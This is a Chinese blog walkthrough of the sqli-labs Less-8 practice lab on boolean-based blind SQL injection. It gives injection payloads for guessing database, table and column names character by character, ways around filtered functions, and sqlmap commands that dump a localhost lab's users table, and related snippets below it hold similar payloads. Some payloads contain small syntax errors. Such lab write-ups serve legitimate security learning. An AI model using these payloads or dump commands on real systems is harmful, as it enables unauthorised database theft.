【sqli-labs】Less 8——布尔盲注

最新推荐文章于 2024-06-02 14:54:06 发布
最新推荐文章于 2024-06-02 14:54:06 发布
阅读量364 收藏
点赞数
分类专栏: #sqli-labs 靶场和漏洞练习 文章标签: 数据库 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71801652/article/details/131535179
版权

一、布尔盲注知识点补充

当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果,这种情况就叫盲注。
布尔型盲注就是利用返回的True或False来判断注入语句是否执行成功。它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。

什么情况下考虑使用布尔盲注?
1. 该输入框存在注入点。
2. 该页面或请求不会回显注入语句执行结果,故无法使用union联合注入。
3. 对数据库报错进行了处理,无论用户怎么输入都不会显示报错信息,故无法使用报错注入。

布尔盲注常用函数

  1. length(select database())>5 #length()里可以放查询语句,用来判断查询结果的长度
  2. exists( ) #exists()里可以放查询语句,用来判断查询结果是否存在
  3. ascii( ) #ascii()里可以放查询语句,用来把查询结果转换为ascii的值
  4. substr( string,pos,length) #用来截取查询结果,string可以用查询语句代替,pos表示截取位置–下标从1开始,length表示截取的长度

1、如果程序过滤了substr函数,可以用其他函数代替:效果与substr()一样
left(str,index)从左边第index开始截取
right(str,index)从右边第index开始截取
substring(str,index)从左边index开始截取
mid(str,index,len)截取str从index开始,截取len的长度
lpad(str,len,padstr)
rpad(str,len,padstr)在str的左(右)两边填充给定的padstr到指定的长度len,返回填充的结果
2、如果程序过滤了 = (等于号),可以用in()、like代替
3、如果程序过滤了ascii(),可以用hex()、bin()、ord()代替

布尔盲注的一般步骤

1、判断数据库名的长度:
and length(database())>7 回显正常;
and length(database())>8 回显错误,说明数据库名是等于8个字符。
2、猜测数据库名(使用ascii码来依次判断):
and (ascii(substr(database(),1,1)))>115%23 通过不断测试,确定ascii值,查看asciii表可以得出该字符,
通过改变database()后面第一个数字,可以往后继续猜测第二个、第三个字母…
3、猜测表名:
and (ascii(substr((select table_name from information_schema.tables where table.schema=database() limit 1,1)1,1)>144%23 
往后继续猜测第二个、第三个字母…
4、猜测字段名(列名):
and (ascii(substr((select column_name from information_schema.columns where table.schema=database() and table_name=’数据库表名’ limit 0,1)1,1)>105%23 
经过猜测 ascii为105为i也就是表的第一个列名id的第一个字母;
同样,通过修改 limit 0,1 获取第二个列名 修改后面1,1的获取当前列的其他字段.
5、猜测字段内容:
因为知道了列名,所以直接 select password from users 就可以获取password里面的内容,username也一样 
and (ascii(substr(( select password from users limit 0,1),1,1)))=68--+

二、解题

第8关出现报错时并没有任何信息的回显,且存在注入点,满足使用布尔盲注的条件。
1、判断数据库的长度
?id=1’ and length(database())>7%23 页面正常
在这里插入图片描述
?id=1’ and length(database())>8%23 页面异常
在这里插入图片描述
由此,可确定数据库名等于8个字符。

2、爆破数据库名
?id=1’ and ascii(substr((database()),1,1)) =115%23
在这里插入图片描述
可以看到当ascll值为115时回显,说明第一个字符为‘s’,剩下的字符依次进行解密,比较麻烦。可以直接用工具burp进行爆破。
有点麻烦,下面直接使用sqlmap进行做题了
在这里插入图片描述
得到注入类型为布尔型盲注。

python sqlmap.py -u "http://localhost/sqli-labs/Less-8/?id=1" --batch --current-db

在这里插入图片描述
得到数据库为security。

python sqlmap.py -u "http://localhost/sqli-labs/Less-8/?id=1" --batch -D security --tables

在这里插入图片描述
得到4个表。

python sqlmap.py -u "http://localhost/sqli-labs/Less-8/?id=1" --batch -D security -T users --dump

在这里插入图片描述
成功拖库出users表中的数据。

Coisini话不投机养乐多
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-8(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 548
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLi LABS Less-8 布尔盲注
热门推荐
wangyuxiang946的博客
02-17 1万+
SQLi 第八关,sqli-labs less8,sqlilabs less 8
sql注入系列之Sqli-labs(less-8)
BetsyMyGirl的博客
12-01 815
判断注入点http://192.168.81.210/sqli/Less-8/?id=1id等于1的时候正常id等于1’的时候页面有改变,因此可以判断存在注入,并且是布尔盲注判断注入类型输入1 and 1=1 和 1 and 1=2发现页面无变化,可以猜测不是数字型注入,为什么?and 逻辑与当条件表达式两边都为真才是真,有一边为假则是假从下方图中可以发现,当and有一边为假的时候,是没有返回内容的所有我们输入的内容传入到数据库执行的语句就变成了select * from users where id=‘
sqli-labs通关详解
m0_52051132的博客
10-15 6765
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6097
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
sqli-labs-基于布尔盲注
zlloveyouforever的博客
04-29 1066
sqli-labs第五关--基于布尔盲注
sqli/less-8
eggplant_lala的博客
02-18 175
sqli/less-8 布尔注入
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs(less-8)
墨鱼菜鸡
09-10 263
目录 less-8(布尔盲注)手工 1.判断闭合方式 2.判断数据库个数 3.判断第一个数据库字符长度 4.根据ascii码判断每个库名的具体字符 5.判断security库中表的个数 6.判断security库里第一个表名的长度 7.判断security库里第一个表的第一个字符的ascii值 8.判断security.users表的...
Sqli-labs Less8
orchid_sea的博客
10-16 999
1.判断注入点 2.判断字段数 3.爆破数据库 4.爆破表 5.爆破列 6.爆破数据
sqli-labs(less8)
m0_68980215的博客
07-08 227
lesson8
SQLMAP 使用笔记
震山的博客
10-11 228
记一下 SqlMap 的使用
Less-8 【布尔盲注
tubug的博客
05-20 429
由上可知我们利用单引号想它发报错然后显示我们想要的信息,但是它并不会显示报错的信息,只显示一个错误的页面。这时候我们尝试利用异常报错的方式来查看是否会显示我们想要的信息。发现它异常报错不会抛出异常错误信息,利用单引号也无法让它显示报错信息,这时候我们就可以利用布尔盲注的方式进行猜解。布尔盲注:我们测试一个字符利用网址对或错的回显,来判断它的内容信息。以此类推比对各种ascii码,我们可知当前数据库所有表的名称为。以此类推比对各种ascii码,我们可知当前数据库的名称为。盲:就是什么都没有,类似盲人。
chat4-Server端保存聊天消息到mysql
最新发布
gulanga5的博客
06-02 830
本文档描述了Server端接收到Client的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql服务端为当前客户端创建一个线程,此线程接收当前客户端的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql本文档主要总结了将聊天消息保存到mysql!!!),;import;import;import;/**用druid连接池来连接数据库的工具类*/DBUtil。
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值